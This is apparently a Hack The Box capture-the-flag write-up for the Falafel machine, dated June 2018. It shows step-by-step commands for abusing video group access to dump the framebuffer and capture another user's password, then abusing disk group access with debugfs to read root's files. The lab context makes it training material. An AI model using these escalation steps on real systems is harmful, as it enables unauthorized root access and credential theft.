HTB Falafel privilege escalation writeup

June 24, 2018

User moshe is in video group

$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)

Frame buffer (/dev/fb0) belongs to video group

$ ls -lah /dev/fb0
crw-rw---- 1 root video 29, 0 Jun 24 09:32 /dev/fb0

Dump framebuffer

$ cat /dev/fb0 > .ayamkambing

Transfer the dump to your machine and find a way to convert the raw framebuffer to image.

I use this - fb2png

That tool only take /dev/fb0 as input so I copied the dump to my own framebuffer first

[[email protected] ~]$ cat ../.ayamkambing > /dev/fb0
[[email protected] ~]$ ./fb2png

You'll get a screenshot of the current screen and user yossi's password is shown. Use su to switch to user yossi (or SSH as yossi)

$ su - yossi
Password:
[email protected]:~$

Yossi is in disk group

[email protected]:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)

Initially I tried to dump the whole /dev/sda1 but greeted with disk full error. Thanks to https://unix.stackexchange.com/questions/90996/ls-on-device-without-mounting-it, I learnt that you can use debugfs to run command on raw disk.

[email protected]:~$ /sbin/debugfs -R "cat /root/root.txt" /dev/sda1
debugfs 1.42.13 (17-May-2015)
23b7920*************f2091c001fa1

Yay!